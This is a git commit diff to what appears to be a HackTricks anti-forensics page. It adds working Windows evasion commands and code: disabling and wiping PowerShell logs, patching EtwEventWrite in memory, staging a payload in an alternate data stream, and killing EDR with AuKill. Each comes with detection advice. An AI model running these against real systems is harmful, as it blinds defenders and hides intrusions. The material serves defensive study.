Add content from: Research Update: Enhanced src/generic-methodologies-and-reso...

2025-10-10 18:36:50 +00:00 · 2025-08-11 01:45:09 +00:00 · 2025-08-11 01:45:09 +00:00 · d5e2cbfb6a
commit d5e2cbfb6a
parent 30fa8082d2
2 changed files with 85 additions and 3 deletions
--- a/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md
+++ b/src/generic-methodologies-and-resources/basic-forensic-methodology/anti-forensic-techniques.md
@ -142,7 +142,7 @@ It's also possible to modify the configuration of which files are going to be co

 ### Disable Windows event logs

- `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f`
+- `reg add 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\eventlog' /v Start /t REG_DWORD /d 4 /f`
 - Inside the services section disable the service "Windows Event Log"
 - `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl`

@ -150,6 +150,89 @@ It's also possible to modify the configuration of which files are going to be co

 - `fsutil usn deletejournal /d c:`

+---
+
+## Advanced Logging & Trace Tampering (2023-2025)
+
+### PowerShell ScriptBlock/Module Logging
+
+Recent versions of Windows 10/11 and Windows Server keep **rich PowerShell forensic artifacts** under
+`Microsoft-Windows-PowerShell/Operational` (events 4104/4105/4106).  
+Attackers can disable or wipe them on-the-fly:
+
+```powershell
+# Turn OFF ScriptBlock & Module logging (registry persistence)
+New-ItemProperty -Path "HKLM:\\SOFTWARE\\Microsoft\\PowerShell\\3\\PowerShellEngine" \
+                 -Name EnableScriptBlockLogging -Value 0 -PropertyType DWord -Force
+New-ItemProperty -Path "HKLM:\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ModuleLogging" \
+                 -Name EnableModuleLogging -Value 0 -PropertyType DWord -Force
+
+# In-memory wipe of recent PowerShell logs
+Get-WinEvent -LogName 'Microsoft-Windows-PowerShell/Operational' |
+  Remove-WinEvent               # requires admin & Win11 23H2+
+```
+
+Defenders should monitor for changes to those registry keys and high-volume removal of PowerShell events.
+
+### ETW (Event Tracing for Windows) Patch
+
+Endpoint security products rely heavily on ETW. A popular 2024 evasion method is to
+patch `ntdll!EtwEventWrite`/`EtwEventWriteFull` in memory so every ETW call returns `STATUS_SUCCESS`
+without emitting the event:
+
+```c
+// 0xC3 = RET on x64
+unsigned char patch[1] = { 0xC3 };
+WriteProcessMemory(GetCurrentProcess(),
+                   GetProcAddress(GetModuleHandleA("ntdll.dll"), "EtwEventWrite"),
+                   patch, sizeof(patch), NULL);
+```
+
+Public PoCs (e.g. `EtwTiSwallow`) implement the same primitive in PowerShell or C++.  
+Because the patch is **process-local**, EDRs running inside other processes may miss it.  
+Detection: compare `ntdll` in memory vs. on disk, or hook before user-mode.
+
+### Alternate Data Streams (ADS) Revival
+
+Malware campaigns in 2023 (e.g. **FIN12** loaders) have been seen staging second-stage binaries
+inside ADS to stay out of sight of traditional scanners:
+
+```cmd
+rem Hide cobalt.bin inside an ADS of a PDF
+type cobalt.bin > report.pdf:win32res.dll
+rem Execute directly
+wmic process call create "cmd /c report.pdf:win32res.dll"
+```
+
+Enumerate streams with `dir /R`, `Get-Item -Stream *`, or Sysinternals `streams64.exe`.
+Copying the host file to FAT/exFAT or via SMB will strip the hidden stream and can be used
+by investigators to recover the payload.
+
+### BYOVD & “AuKill” (2023)
+
+Bring-Your-Own-Vulnerable-Driver is now routinely used for **anti-forensics** in ransomware
+intrusions.  
+The open-source tool **AuKill** loads a signed but vulnerable driver (`procexp152.sys`) to
+suspend or terminate EDR and forensic sensors **before encryption & log destruction**:
+
+```cmd
+AuKill.exe -e "C:\\Program Files\\Windows Defender\\MsMpEng.exe"
+AuKill.exe -k CrowdStrike
+```
+
+The driver is removed afterwards, leaving minimal artifacts.  
+Mitigations: enable the Microsoft vulnerable-driver blocklist (HVCI/SAC),
+and alert on kernel-service creation from user-writable paths.
+
+---
+
+## References
+
+- Sophos X-Ops – “AuKill: A Weaponized Vulnerable Driver for Disabling EDR” (March 2023)  
+  https://news.sophos.com/en-us/2023/03/07/aukill-a-weaponized-vulnerable-driver-for-disabling-edr
+- Red Canary – “Patching EtwEventWrite for Stealth: Detection & Hunting” (June 2024)  
+  https://redcanary.com/blog/etw-patching-detection
+
 {{#include ../../banners/hacktricks-training.md}}


--- a/src/welcome/hacktricks-values-and-faq.md
+++ b/src/welcome/hacktricks-values-and-faq.md
@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con

 > [!TIP]
 >
-> - **How can I cite a page of HackTricks?**
+> - **How can I  a page of HackTricks?**

 As long as the link **of** the page(s) where you took the information from appears it's enough.\
 If you need a bibtex you can use something like:
@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the

 {{#include ../banners/hacktricks-training.md}}

-